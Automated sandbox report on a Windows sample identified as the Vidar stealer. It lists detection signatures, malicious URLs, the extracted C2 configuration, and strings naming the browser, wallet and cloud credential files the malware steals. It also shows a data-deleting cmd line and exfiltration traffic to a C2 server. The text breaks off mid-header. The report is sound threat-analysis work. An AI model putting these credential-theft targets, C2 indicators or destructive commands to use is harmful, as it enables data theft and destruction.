Windows Analysis Report
25xTHcaF7V.exe

Overview

General Information

Sample name: 25xTHcaF7V.exe
renamed because original name is a hash value
Original sample name: e7c964e5bd52da0b4ff1e6543608cf27.exe
Analysis ID: 1598005
MD5: e7c964e5bd52da0b4ff1e6543608cf27
SHA1: b369051de7f7bdf58411fb604eef85507965abf2
SHA256: 33cab7cd9069c761a907a2498c2d496da5e9332412b13472710e774ca80c4b48
Tags: exe, user-abuse_ch

Detection

Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Attempt to bypass Chrome Application-Bound Encryption
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Vidar stealer
C2 URLs / IPs found in malware configuration
Drops PE files with a suspicious file extension
Found API chain indicative of sandbox detection
Found many strings related to Crypto-Wallets (likely being stolen)
Joe Sandbox ML detected suspicious sample
Monitors registry run keys for changes
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
OS version to string mapping found (often used in BOTs)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Browser Started with Remote Debugging
Sigma detected: Suspicious Copy From or To System Directory
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Classification chart (categories: Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner; scale: clean, suspicious, malicious)

AV Detection

Source: https://tlfiyat.shop/X5 Avira URL Cloud: Label: malware
Source: https://tlfiyat.shop/W; Avira URL Cloud: Label: malware
Source: https://tlfiyat.shop/s Avira URL Cloud: Label: malware
Source: https://tlfiyat.shop/s5i. Avira URL Cloud: Label: malware
Source: https://tlfiyat.shop/O Avira URL Cloud: Label: malware
Source: https://tlfiyat.shop/ Avira URL Cloud: Label: malware
Source: https://tlfiyat.shop/k Avira URL Cloud: Label: malware
Source: https://tlfiyat.shop# Avira URL Cloud: Label: malware
Source: https://tlfiyat.shop/;8 Avira URL Cloud: Label: malware
Source: 0000000D.00000002.3582252732.00000000019B6000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: Vidar {"C2 url": "https://steamcommunity.com/profiles/76561199819539662", "Botnet": "go2dniz"}
Source: 25xTHcaF7V.exe Virustotal: Detection: 31%
Source: 25xTHcaF7V.exe ReversingLabs: Detection: 31%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 84.2% probability
Source: 25xTHcaF7V.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.12:49711 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.12:49712 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.12:49719 version: TLS 1.2
Source: unknown HTTPS traffic detected: 5.75.209.106:443 -> 192.168.2.12:49720 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.12:49721 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.12:49760 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.12:49935 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.12:49945 version: TLS 1.2
Source: 25xTHcaF7V.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: vdr1.pdb source: Surrey.com, 0000000D.00000002.3582252732.00000000019B6000.00000004.00000020.00020000.00000000.sdmp, Surrey.com, 0000000D.00000003.2603391503.00000000043EC000.00000004.00000800.00020000.00000000.sdmp, Surrey.com, 0000000D.00000002.3581740301.0000000001903000.00000004.00000020.00020000.00000000.sdmp, Surrey.com, 0000000D.00000002.3585659448.00000000043E1000.00000040.00001000.00020000.00000000.sdmp, Surrey.com, 0000000D.00000003.2603286860.0000000001921000.00000004.00000020.00020000.00000000.sdmp, Surrey.com, 0000000D.00000003.2603167258.000000000436E000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: A{"id":1,"method":"Storage.getCookies"}|.tgz.gzSecurityHistoryWork Dir: In memorySOFTWARE\Microsoft\Cryptographyfirefox%08lX%04lX%lu_key.txtSoft\Steam\steam_tokens.txt\Discord\tokens.txtpasswords.txtinformation.txtlocalhostWebSocketClient" & exitGdipGetImageHeightSoftGdipGetImagePixelFormatN0ZWFt\Monero\wallet.keysAzure\.awsstatusWallets_CreateProcessGdipGetImageEncodershttpsSoftware\Martin Prikryl\WinSCP 2\SessionsPlugins/devtoolsprefs.jsLocal Extension SettingsSync Extension SettingsFilescookiesCookies\BraveWallet\Preferenceskey_datas%s\%s\%sPortNumberCurrentBuildNumberGdiplusStartup.zipGdipCreateHBITMAPFromBitmapOpera Crypto.zooUnknownGdiplusShutdown/json_logins.jsoninvalid string positionSoftware\Martin Prikryl\WinSCP 2\ConfigurationDisplayVersionSOFTWARE\Microsoft\Windows NT\CurrentVersionopentokenamcommunity.comTelegramSoftware\Valve\SteamGdipSaveImageToStreamGdipLoadImageFromStream\AppData\Roaming\FileZilla\recentservers.xml.dllSOFTWARE\Microsoft\Windows\CurrentVersion\Uninstallapprove_aprilNetworkblock.arjprofiles.ini.lzhGdipGetImageWidthwallet_pathSteamPathscreenshot.jpgstring too longvector<T> too longProcessorNameStringloginusers.vdflibraryfolders.vdfconfig.vdfDialogConfig.vdfDialogConfigOverlay*.vdfGdipGetImageEncodersSizesteam.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\cmd.exeC:\Windows\system32\rundll32.exeBravetrueformhistory.sqlitecookies.sqliteplaces.sqliteLocal StatefalseAzure\.azureSOFTWARE\monero-project\monero-corechromefile_nameDisplayNameHostNameProductNameUserNameGdipSaveImageToFilemsal.cacheGdipDisposeImagemodeAzure\.IdentityServiceUseMasterPasswordhwidMachineGuidtask_idbuild_idCrash DetectedDisabled%dx%d%d/%d/%d %d:%d:%d.arcvdr1.pdb\Local Storage\leveldb_0.indexeddb.leveldb_formhistory.db_history.db_cookies.db_passwords.db_webdata.db_key4.db\key4.dbfile_dataLogin DataWeb DataoperaOperachrome-extension_[Processes][Software]\storage\default\\.aws\errors\\Telegram 
Desktop\\Steam\\config\\.azure\ Stable\\.IdentityService\\discord\/c timeout /t 10 & rd /s /q "C:\ProgramData\" & rd /s /q "C:\ProgramData\\..\.ZDISPLAYOpera GXEXCEPTION_INT_OVERFLOWEXCEPTION_FLT_OVERFLOWEXCEPTION_STACK_OVERFLOWEXCEPTION_FLT_UNDERFLOWPOSTEXCEPTION_BREAKPOINT\Local Storage\leveldb\CURRENTEXCEPTION_DATATYPE_MISALIGNMENTEXCEPTION_FLT_INEXACT_RESULTGETEXCEPTION_IN_PAGE_ERRORdQw4w9WgXcQEXCEPTION_SINGLE_STEPGdipCreateBitmapFromHBITMAPEXCEPTION_INT_DIVIDE_BY_ZEROEXCEPTION_FLT_DIVIDE_BY_ZEROEXCEPTION_NONCONTINUABLE_EXCEPTIONUNKNOWN EXCEPTIONEXCEPTION_INVALID_DISPOSITIONEXCEPTION_PRIV_INSTRUCTIONEXCEPTION_ILLEGAL_INSTRUCTIONEXCEPTION_FLT_INVALID_OPERATIONEXCEPTION_ACCESS_VIOLATIONEXCEPTION_FLT_STACK_CHECKEXCEPTION_FLT_DENORMAL_OPERANDEXCEPTION_ARRAY_BOUNDS_EXCEEDED%d MBIndexedDBOCALAPPDATA?<Host><Port><User><Pass encoding="base64">http://localhost:"webSocketDebuggerUrl":6^userContextId=4294967295465 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73ws://localhost:9223.metadata-v2:22.ps15121Windows 11HTTP/1.1HARDWA
Source: Binary string: cryptosetup.pdbGCTL source: Surrey.com, 0000000D.00000002.3584705678.0000000004362000.00000004.00000800.00020000.00000000.sdmp, i5pz5p.13.dr
Source: Binary string: cryptosetup.pdb source: Surrey.com, 0000000D.00000002.3584705678.0000000004362000.00000004.00000800.00020000.00000000.sdmp, i5pz5p.13.dr
Source: Binary string: 1.pdb\ source: Surrey.com, 0000000D.00000003.2603234509.00000000019CA000.00000004.00000020.00020000.00000000.sdmp, Surrey.com, 0000000D.00000003.2603053985.0000000001935000.00000004.00000020.00020000.00000000.sdmp, Surrey.com, 0000000D.00000003.2603019804.00000000019CA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 1.pdb source: Surrey.com, 0000000D.00000003.2603234509.00000000019CA000.00000004.00000020.00020000.00000000.sdmp, Surrey.com, 0000000D.00000003.2603053985.0000000001935000.00000004.00000020.00020000.00000000.sdmp, Surrey.com, 0000000D.00000003.2603019804.00000000019CA000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Code function: 0_2_004062D5 FindFirstFileW,FindClose, 0_2_004062D5
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Code function: 0_2_00402E18 FindFirstFileW, 0_2_00402E18
Source: C:\Users\user\Desktop\25xTHcaF7V.exe Code function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 0_2_00406C9B
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_009ADC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 13_2_009ADC54
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_009BA087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 13_2_009BA087
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_009BA1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 13_2_009BA1E2
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_009AE472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 13_2_009AE472
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_009BA570 FindFirstFileW,Sleep,FindNextFileW,FindClose, 13_2_009BA570
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_009B66DC FindFirstFileW,FindNextFileW,FindClose, 13_2_009B66DC
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_0097C622 FindFirstFileExW, 13_2_0097C622
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_009B73D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 13_2_009B73D4
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_009B7333 FindFirstFileW,FindClose, 13_2_009B7333
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_009AD921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 13_2_009AD921
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\634977
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\634977\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\
Source: chrome.exe Memory has grown: Private usage: 5MB later: 31MB

Networking

Source: Network traffic Suricata IDS: 2859378 - Severity 1 - ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2 : 192.168.2.12:49722 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1 : 192.168.2.12:49724 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.12:49726 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.12:49727 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.12:49758 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.12:49776 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.12:49750 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.12:49755 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.12:49755 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 5.75.209.106:443 -> 192.168.2.12:49724
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.12:49756 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.12:49756 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.12:49757 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.12:49757 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.12:49792 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.12:49792 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 5.75.209.106:443 -> 192.168.2.12:49725
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.12:49800 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.12:49800 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.12:49835 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.12:49835 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.12:49816 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.12:49816 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.12:49821 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.12:49821 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.12:49874 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.12:49874 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.12:49924 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.12:49943 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.12:49962 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.12:49954 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.12:49949 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.12:49930 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.12:49948 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.12:49944 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.12:49942 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.12:49946 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.12:49947 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.12:49951 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.12:49958 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.12:49952 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.12:49953 -> 5.75.209.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.12:49959 -> 5.75.209.106:443
Source: Malware configuration extractor URLs: https://steamcommunity.com/profiles/76561199819539662
Source: global traffic TCP traffic: 192.168.2.12:49731 -> 1.1.1.1:53
Source: global traffic HTTP traffic detected: GET /sc1phell HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
Source: Joe Sandbox View IP Address: 2.22.242.105
Source: Joe Sandbox View IP Address: 149.154.167.99
Source: Joe Sandbox View IP Address: 18.238.49.74
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: C:\Users\user\AppData\Local\Temp\634977\Surrey.com Code function: 13_2_009BD889 InternetReadFile,SetEvent,GetLastError,SetEvent, 13_2_009BD889
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0Host: tlfiyat.shopConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CI+2yQEIpbbJAQipncoBCO6LywEIlKHLAQic/swBCPqYzQEIhaDNAQjcvc0BCNrDzQEIj8rNAQi5ys0BCJ/RzQEI3NPNAQjR1s0BCPTWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CI+2yQEIpbbJAQipncoBCO6LywEIlKHLAQic/swBCPqYzQEIhaDNAQjcvc0BCNrDzQEIj8rNAQi5ys0BCJ/RzQEI3NPNAQjR1s0BCPTWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531 HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-edge-ntp: {"back_block":0,"bg_cur":{},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowPrivateTarget","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"","show_greet":true,"vt_opened":false}Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/SSR-extension.bb64361f77a4185b4ba3.js HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-viewport-height: 876sec-ch-ua-arch: "x86"sec-ch-viewport-width: 1232sec-ch-ua-platform-version: "10.0.0"downlink: 1.5sec-ch-ua-full-version-list: "Microsoft Edge";v="117.0.2045.47", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-platform: "Windows"device-memory: 8rtt: 100sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-full-version: "117.0.2045.47"sec-ch-dpr: 1ect: 4gAccept: */*sec-edge-ntp: {"back_block":0,"bg_cur":{},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowPrivateTarget","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"","show_greet":true,"vt_opened":false}Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; sptmarket=en-GB||us|en-us|en-us|en||cf=8|RefA=3A35C6D9C75F44F1A696E1F20ED10EDD.RefC=2025-01-23T19:40:11Z; USRLOC=; MUID=36CB6A348F62672B3E3A7F498E00663A; MUIDB=36CB6A348F62672B3E3A7F498E00663A; _EDGE_S=F=1&SID=31C482BC84B769983F0597C18506681B; _EDGE_V=1
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/web-worker.c7d27109b98aa5c6a189.js HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-viewport-height: 876sec-ch-ua-arch: "x86"sec-ch-viewport-width: 1232sec-ch-ua-platform-version: "10.0.0"downlink: 1.5sec-ch-ua-bitness: "64"sec-ch-ua-full-version-list: "Microsoft Edge";v="117.0.2045.47", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-platform: "Windows"device-memory: 8rtt: 100sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-full-version: "117.0.2045.47"sec-ch-dpr: 1ect: 4gAccept: */*sec-edge-ntp: 